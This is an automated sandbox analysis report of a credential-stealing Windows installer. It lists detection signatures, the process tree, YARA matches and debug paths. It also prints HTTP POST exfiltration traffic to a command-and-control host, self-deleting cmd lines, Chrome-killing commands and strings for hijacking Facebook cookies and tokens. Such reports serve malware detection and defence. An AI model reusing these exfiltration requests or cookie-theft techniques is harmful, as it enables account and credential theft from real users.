
Analysis Report FileSetup-v17.04.41.exe

Overview

General Information

Sample Name: FileSetup-v17.04.41.exe
Analysis ID: 345937
MD5: b7234e4a9aaaacefa890535f8117c8fc
SHA1: 24c4321111ff004105c14e29662682f16900de29
SHA256: a8fefe8e1f92a30d1cdd4e2e2afaacf08a02c8961f496ee16e89062417ec5f28
Tags: Stealer

Most interesting Screenshot:

Detection

Score: 90
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file name differs from the original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

Startup

  • System is w10x64
  • FileSetup-v17.04.41.exe (PID: 5292 cmdline: 'C:\Users\user\Desktop\FileSetup-v17.04.41.exe' MD5: B7234E4A9AAAACEFA890535F8117C8FC)
    • msiexec.exe (PID: 3488 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • 6852B33702F6B3BD.exe (PID: 2124 cmdline: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe 0011 installp3 MD5: B7234E4A9AAAACEFA890535F8117C8FC)
      • 1611946678493.exe (PID: 5404 cmdline: 'C:\Users\user\AppData\Roaming\1611946678493.exe' /sjson 'C:\Users\user\AppData\Roaming\1611946678493.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
      • ThunderFW.exe (PID: 1036 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)
      • cmd.exe (PID: 3688 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 5240 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • 6852B33702F6B3BD.exe (PID: 4640 cmdline: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe 200 installp3 MD5: B7234E4A9AAAACEFA890535F8117C8FC)
      • cmd.exe (PID: 720 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 6176 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • cmd.exe (PID: 6568 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 6636 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • cmd.exe (PID: 5384 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\FileSetup-v17.04.41.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 4920 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • msiexec.exe (PID: 6028 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E90BF9A81DF75408BCAEC738866B933F C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.261933148.00000000028E0000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000004.00000002.385937201.00000000027D0000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000005.00000002.290296269.0000000002810000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.6852B33702F6B3BD.exe.2810000.5.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.6852B33702F6B3BD.exe.27d0000.5.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.6852B33702F6B3BD.exe.10000000.7.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
1.2.FileSetup-v17.04.41.exe.28e0000.5.raw.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
5.2.6852B33702F6B3BD.exe.2810000.5.raw.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | ReversingLabs: Detection: 47%
Multi AV Scanner detection for submitted file
Source: FileSetup-v17.04.41.exe | Virustotal: Detection: 60%
Source: FileSetup-v17.04.41.exe | ReversingLabs: Detection: 47%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: FileSetup-v17.04.41.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,4_2_1001F720
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: -----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLfprfltmOHTzR+m/YBEdzgxnHwXgNPal/ctcPxx2L3by8pqL9tpgSgEYEeIp+DMIOFvh0gY6/gt7hqXrairRK8XHrlfJJxucOxb54FThG8Apu+IsnhM3AKABV2b3P5PeloDtfi8E0TdADPHr0kgcvS7YUOm7Z/hoSXkJsrwXBOQIDAQAB-----END PUBL | 1_2_00412872
Source: FileSetup-v17.04.41.exe | Binary or memory string: -----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLfprfltmOHTzR+m/YBEdzgxnH wXgNPal/ctcPxx2L3by8pqL9tpgSgEYEeIp+DMIOFvh0gY6/gt7hqXrairRK8XHr lfJJxucOxb54FThG8Apu+IsnhM3AKABV2b3P5PeloDtfi8E0TdADPHr0kgcvS7YU Om7Z/hoSXkJsrwXBOQIDAQAB -----END PUBL

Compliance:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Unpacked PE file: 5.2.6852B33702F6B3BD.exe.2810000.5.unpack
Uses 32bit PE files
Source: FileSetup-v17.04.41.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Uses new MSVCR Dlls
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Binary contains paths to debug symbols
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.4.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611946678493.exe, 0000000B.00000000.271662434.000000000040F000.00000002.00020000.sdmp, 1611946678493.exe.4.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.4.dr
Source: Binary string: atl71.pdbT source: atl71.dll.4.dr
Source: Binary string: atl71.pdb source: atl71.dll.4.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.4.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.4.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.4.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.4.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.4.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.4.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001D.00000000.367402647.0000000000BFC000.00000002.00020000.sdmp, ThunderFW.exe.4.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.4.dr
Source: Binary string: e:\KINGSOFT_DUBA\Build\Build_Src\kisengine\kisengine\product\win32\dbginfo\kinst_exe.pdb source: FileSetup-v17.04.41.exe
Source: Binary string: msvcr71.pdb source: msvcr71.dll.4.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: gdiview.msi.1.dr
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: z:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: x:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: v:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: t:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: r:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: p:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: n:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: l:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: j:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: h:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: f:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: b:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: y:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: w:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: u:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: s:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: q:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: o:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: m:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: k:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: i:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: g:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: e:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: a:
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_004C2B17 __getdrive,FindFirstFileA,_strlen,_IsRootUNCName,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,___dtoxmode,GetLastError,FindClose,1_2_004C2B17
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_1001A170 FindFirstFileA,FindClose,4_2_1001A170
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_0041E22C GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,1_2_0041E22C
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\

Networking:

Uses ping.exe to check the status of other devices and networks
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global traffic | HTTP traffic detected: GET /info_old/ddd HTTP/1.1 | Host: 84CFBA021A5A6662.xyz | Accept: */*
Source: global traffic | HTTP traffic detected: POST //fine/send HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 84 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 93 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 93 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 93 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/e HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 677 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/g HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 1405 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: GET /info_old/r HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: GET /info_old/r HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: GET /info_old/ddd HTTP/1.1 | Host: 84CFBA021A5A6662.xyz | Accept: */*
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe | String found in binary or memory: _time":"13245951499607797","lastpingday":"13245947458072931","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: 